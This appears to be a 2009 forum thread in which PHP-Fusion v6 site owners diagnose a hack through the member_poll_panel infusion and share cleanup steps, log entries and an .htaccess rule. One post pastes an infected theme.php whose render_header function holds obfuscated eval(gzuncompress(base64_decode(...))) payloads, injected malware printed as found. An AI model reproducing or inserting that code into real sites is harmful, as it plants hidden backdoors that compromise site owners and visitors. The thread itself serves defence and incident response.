Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Sign In
Not a member yet? Click here to register.

NEW V6 HACK - BLANK SCREEN ??


Print Track
To all of you v6-users:

Delete immediately the map member_poll_panel from your FTP-Server !!!

I have fixed 4 sites right now the last approximately 5 hours.

They all running under v6. From v6.01.15 to v6.01.18 I discovered. But I'm nut sure if the go for older versions too.


If your site is hacked:

1. If you have a Poll running - disable it from: Admin Panel->System Admin->Panels.

2. Open up the file: /themes/YOUR_THEME/theme.php - & delete the long text near to the top of the file. You can't miss it.

3. Delete the map: /infusions/member_poll_panel

4. Open up phpMyAdmin.

5. Click on the left side on "fusion_panels".

6. Delete panel_name: System / panel_filename: ../images/panel.php


Cheers!

41 replies

has to be something only one person know how to do, not on milw0rm.. yet.

go to http://milw0rm.com/search.php
search php-fusion
They got my site too. I have all the logs, the exact time they did it and a copy of the hacked site.

I have the full logs and an archive of the hacked site including the database. They end up putting a file in the photo gallery named panel.php.

67.219.63.53 - - [25/Nov/2009:22:51:25 -0700] "GET /infusions/member_poll_panel/config.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"

That is the ip of the guy who hacked me and I believe he is correct. It is done through the member_poll_panel.

It was the latest release for version 6.

If you looked at the source for the blank page, it has this at the bottom.

<!--gdtg--><ul>
<li><a href="http://www.vaughangenealogy.org/ffff/infusions/navigation_panel/mobile/lsu-arkansas-basketball-game/">Cal state fullerton mens basketball</a></li>

With many more lines of that same site.

If any admin wants what I have, let me know.
Yes - we must have a v6.01.19 then. Soon.
I wouldn't have posted what that person did in a public forum if I were you.

Quote

Whitey wrote:
I wouldn't have posted what that person did in a public forum if I were you.


The exploit was not revealed. The one log entry I posted isn't the hack but does show that it originates there. If you notice it says 404.

I have an idea of how it was done but I haven't tested it yet. I was just confirming what the original posted stated and agree with his temp fix.

Looking at it further, the exploit that adds the eval code in the theme file actually happened about 15 days before they took down the site. It looks like it was another file that they used to load a script from http://www.abruzzobooking.it (not showing the dir or file since they have been moved/erased already.

I just happened to have a backup of the theme that I use in order to convert it to v7. The day I downloaded it, there is suspicious entries in the log and the eval is in it. The backup from the first of the month, does not have the eval code in the theme.
If you have v6 (or even V7) you may want to add a little security into your .htaccess file.

RewriteEngine on
RewriteBase /
RewriteCond %{QUERY_STRING} ^_SERVER\[DOCUMENT_ROOT\]=*
RewriteRule ^$ /error404.html$ [NC,L]

you may have the first two lines, if not you can add them. You probably do not have the second two, add them. It will help against some script kiddies.
BTW, change all your admin passwords if you think you may have been hacked (the eval string in the theme.php file is a dead give away).

There is evidence that my site was compromised at least 15 days before the end result. The tell tail sign is that in the logs was POST /administration/db_backup.php. They have all your passwords. That is how they added the panel. POST /administration/panel_editor.php
I think one of mine has been hacked
Just looking but not sure I will get all the bits


PLEASE HELP ME FIX THE HACKED SITE

I have deleted the line in theme.php but still have blank screen
this is the theme.php file

what needs deleting?


(which bit needs removing and which bit keeping?)
I have tried deleting the {eval(gzuncompress...... bit but still have a blank screen



there is the following:


CodeDownload  
if ($settings['locale'] == "Italian") { $mydate = "%A, %d %B %Y"; } else { $mydate = "%A, %B %d, %Y"; }

function render_header($header_content) {eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj')));eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj')));eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj')));

global $theme_width,$settings,$mydate;



Full copy of theme.php

CodeDownload  
<?
/*---------------------------------------------------+
| PHP-Fusion 6 Content Management System
+----------------------------------------------------+
| Copyright © 2002 - 2005 Nick Jones
| http://www.php-fusion.co.uk/
+----------------------------------------------------+
| Released under the terms & conditions of v2 of the
| GNU General Public License. For details refer to
| the included gpl.txt file or visit http://gnu.org
+----------------------------------------------------+
| THEME: LinuxGnome
+----------------------------------------------------+
| Copyright © 2005 Nichelini Giuseppe   
| http://www.nichelini.it/
+----------------------------------------------------*/
// theme settings
$body_text = "#2F3F6F";
$body_bg = "#DFDFDF";
$theme_width = "100%";
$theme_width_l = "180";
$theme_width_r = "180";
if ($settings['locale'] == "Italian") { $mydate = "%A, %d %B %Y"; } else { $mydate = "%A, %B %d, %Y"; }

function render_header($header_content) {eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj')));eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj')));eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj')));

global $theme_width,$settings,$mydate;

echo "<table align='center' width='$theme_width' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td>\n";
echo "<table width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td class='full-header'>\n";
echo "<table width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td height='90' valign='middle'>".$header_content."</td>\n";
echo "</table>\n";
echo "</td></tr>\n";
echo "</table>\n";
echo "<table align='center' width='$theme_width' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/menu-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>\n";
$result = dbquery("SELECT * FROM ".DB_PREFIX."site_links WHERE link_position>='2' ORDER BY link_order");
if (dbrows($result) != 0) {
   $i = 0;
   while($data = dbarray($result)) {
      if (checkgroup($data['link_visibility'])) {
         if ($data['link_url'] != "---") {
            if ($i != 0) { echo " ·\n"; } else { echo "\n"; }
            $link_target = ($data['link_window'] == "1" ? " target='_blank'" : "");
            if (strstr($data['link_url'], "http://") || strstr($data['link_url'], "https://")) {
               echo "<a href='".$data['link_url']."'".$link_target." class='white'>".$data['link_name']."</a>";
            } else {
               echo "<a href='".BASEDIR.$data['link_url']."'".$link_target." class='white'>".$data['link_name']."</a>";
            }
         }
         $i++;
      }
   }
}
echo "</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='5%' align='right' background='".THEME."images/title-silverbg.gif' nowrap>".ucwords(showdate($mydate, time()))."</td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/menu-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<table width='100%' cellspacing='0' cellpadding='0'>\n<tr>\n";

}

function render_footer($license=false) {

global $theme_width,$settings,$locale;

$textfooter = $settings['counter']." ".($settings['counter'] == 1 ? $locale['140']."&nbsp; | &nbsp; \n" : $locale['141']."&nbsp; | &nbsp; \n");
if ($license == false) {
   $textfooter .= "Powered by <a target='_blank' href='http://www.php-fusion.co.uk' class='white'><img src='".THEME."images/pf_blue.gif' style='vertical-align:top;' alt='powered by php-fusion' border='0'></a> v".$settings['version']." © 2003-2005\n";
   $textfooter .= "&nbsp; | &nbsp; Theme LinuxGnome <a target='_blank' href='http://www.nichelini.it' class='white'><img src='".THEME."images/nick56_micro.gif' style='vertical-align:top;' alt='Design by Nick56'  border='0'></a>\n";


echo "</tr>\n</table>\n";
tablebreak();
echo "<table align='center' width='$theme_width' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='100%' background='".THEME."images/title-bluebg.gif' nowrap align='center'><font color='#FFFFFF'><b>".$textfooter."</b></font></td></tr>\n";
echo "</table>\n";
}

function render_news($subject, $news, $info) {
global $locale,$mydate;

tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$subject."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='5%' align='right' background='".THEME."images/title-silverbg.gif' nowrap>&nbsp;</td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td colspan='3'>".$news."</td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";

echo "<td valign='bottom' align='left'><br>";
echo $locale['040']."<a href='profile.php?lookup=".$info['user_id']."'>".$info['user_name']." </a> ".$locale['041'].showdate($mydate, $info['news_date'])."";
echo "</td><td colspan='2' valign='bottom' align='right'><br>";
echo ($info['news_ext'] == "y" ? "<a href='news.php?readmore=".$info['news_id']."'><img src='".THEME."images/readmore.gif' title='".$locale['249']."' border='0'></a> " : "")."";
echo "<a href='news.php?readmore=".$info['news_id']."'><img src='".THEME."images/postacomment.gif' title='".$locale['250']."' border='0'></a> ";
echo "<a href='print.php?type=N&item_id=".$info['news_id']."'><img src='".THEME."images/print.gif' title='".$locale['251']."' border='0'></a>";

echo "</td><td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";

echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
echo "<td width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";
}

function render_article($subject, $article, $info) {
global $locale,$mydate;

tablebreak();
echo "<table align='center' width='100%' cellspacing='0' cellpadding='0'>\n";
echo "<tr><td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-left-corner.gif' width='6' height='22' alt=''></td>\n";
echo "<td background='".THEME."images/title-bluebg.gif' nowrap>&nbsp;<font color='#FFFFFF'><b>".$subject."</b></font></td>\n";
echo "<td background='".THEME."images/title-silverbg.gif'><img border='0' src='".THEME."images/title-cascade.gif' width='43' height='22' alt=''></td>\n";
echo "<td width='5%' align='right' background='".THEME."images/title-silverbg.gif' nowrap>&nbsp;</td>\n";
echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='storybox' colspan='3'>".$article."</td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='storybox' colspan='3'><hr class='side-hr'></td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td valign='bottom' align='left'><br>";
echo $locale['040']."<a href='profile.php?lookup=".$info['user_id']."'>".$info['user_name']." </a> ".$locale['041'].showdate($mydate, $info['article_date'])."";
echo "</td><td colspan='2' valign='bottom' align='right'><br>";
echo ($info['news_ext'] == "y" ? "<a href='articles.php?readmore=".$info['article_id']."'><img src='".THEME."images/readmore.gif' title='".$locale['249']."' border='0'></a> " : "")."";
echo "<a href='articles.php?readmore=".$info['article_id']."'><img src='".THEME."images/postacomment.gif' title='".$locale['250']."' border='0'></a> ";
echo "<a href='print.php?type=A&item_id=".$info['article_id']."'><img src='".THEME."images/print.gif' title='".$locale['251']."' border='0'></a>";
echo "</td><td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";

echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
